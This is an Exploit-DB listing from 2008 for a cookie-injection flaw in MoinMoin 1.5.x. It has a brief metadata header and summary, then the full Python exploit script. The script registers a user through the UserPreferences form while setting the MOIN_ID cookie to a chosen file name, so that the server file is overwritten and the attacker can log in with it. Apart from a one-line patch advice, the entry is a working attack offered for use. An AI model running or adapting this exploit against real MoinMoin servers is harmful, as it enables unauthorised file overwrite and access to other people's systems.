Exploit for the MOIND_ID cookie Bug

vendor:

MoinMoin

by:

just a nonroot and colombian user

7.5

CVSS

HIGH

Cookie Injection

CWE

Product Name: MoinMoin

Affected Version From: MoinMoin 1.5.x

Affected Version To: MoinMoin 1.5.x

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Exploit for the MOIND_ID cookie Bug

This exploit allows an attacker to inject a malicious cookie into the MoinMoin 1.5.x web application. The malicious cookie can be used to overwrite a file on the server, allowing the attacker to gain access to the system. The exploit is coded in Python and requires the attacker to provide the URL of the MoinMoin application, the username, password, and email address of the user to be created, and the file to be overwritten.

Mitigation:

Ensure that the application is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
#Exploit for the MOIND_ID cookie Bug
# MoinMoin 1.5.x
#
#Find your patch in : http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630
#
#Bug and exploit coded by just a nonroot and colombian user
#
#Enero 21 de 2008
#
#Greets: el directorio and all the SL community
#
# 
import urllib2,sys
print "MoinMoin host: i.e: http://127.0.0.1:8000/"
host=raw_input("MoinMoin host ( include http and /): ")
#info for the new user
#
#user for the test
user='nonroot'
#password for the test
password='nonrootuser'
#email for the test
email='just@nonrootuser.co'
#file to overwrite
#by default this file is there, is there?
archivo='README'
#######
#
req = urllib2.Request(host) 
adddata="action=userform&name="+user+"&aliasname=ilikecolombianpeople&password="+password+"&password2="+password+"&email="+email+"&css_url=&edit_rows=20&theme_name=modern&editor_default=text&editor_ui=freechoice&tz_offset=0&datetime_fmt=&language=&remember_me=1&show_fancy_diff=1&show_toolbar=1&show_page_trail=1&quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si&save=Save"
headers={'Cookie':'MOIN_ID='+archivo}
req = urllib2.Request(host+"UserPreferences/",adddata,headers) 
try:
	r = urllib2.urlopen(req)
	data=r.read()
except	urllib2.HTTPError:
	print "Wait a minute, is posible that the file: "+archivo+" doesn't have permission to write, think well, and try again"
	sys.exit(2)
print "Ok, the file: "+archivo+" was created, and you can logging setting the cookie MOIN_ID='"+archivo+"'"+" in your browser."
sys.exit(0)

# milw0rm.com [2008-01-21]